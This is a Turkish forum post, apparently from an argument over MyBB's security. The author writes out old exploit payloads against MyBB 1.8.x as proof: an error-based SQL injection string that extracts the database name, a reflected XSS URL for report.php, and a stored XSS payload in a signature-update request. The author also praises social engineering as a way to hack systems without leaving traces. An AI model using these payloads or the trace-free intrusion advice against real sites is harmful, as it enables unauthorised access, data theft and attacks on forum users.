Hocam öncelikle bu tür konuşmalardan hiç haz etmiyorum.Oturup mybb bir sisteme giriş yapmam ne bana birşey kazandırır ne size birşey kazandırır ancak kendini kanıtlama çabasına girer.Bunuda ancak bu mesleğe yeni atılan kişilerin ani bir hevesle atılım yapmaya çalışması söz konusudur.Başarılı olunması bile kendini küçük düşürme nedenidir yani.

Size örnek olarak geçmişe dönük bir kaç exp açıklaması yapayım tezinizin ne kadar yanlış olduğunu görmenizi sağlar.

1. SQL Injection

POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#

2. Cross Site Scripting

localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 hemde en basit pocla etkileşime giriyor.Yeni yetmeler dahi bu hatayı yapmaz ama yapılabiliyor sonuç olarak insan yapımı ve "en büyük güvenlik açığı insandır".

Açık nerede kardeşim diyenler için









En tehlikeli zafiyelerden birisi olarak kabul gören Stored XSS - Signature

my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature

vs vs şeklinde gidiyor :).Hack işlemlerinde en büyük etki Sm'dir hocam bunu unutmayın.Sistemde bir zafiyet bulamayabilirsiniz, gözünüzden kaçabilir.Fakat doğru bir sm direk sonuca ulaştırır ve kaliteli bir senaryo ile iz bırakmaz.

Sistemler genellikle dikkatsiz plugin kullanımından hacklenir beğendiğiniz önünüze gelen herşeyi yüklememelisiniz..Sonsuz döngü de olan webmaster üşengeçliğini artık yazmak dahi istemiyorum.Gördüğün gibi tamamen mybb kendisinden kaynaklanan sorunlar.0day expler artık istenilen verimi karşılamadıkları sürece public edilmezler.Kimse bu riski almaz eski expleri incelemek için zaten herhangi bir arama motorunu kullanabilirsiniz.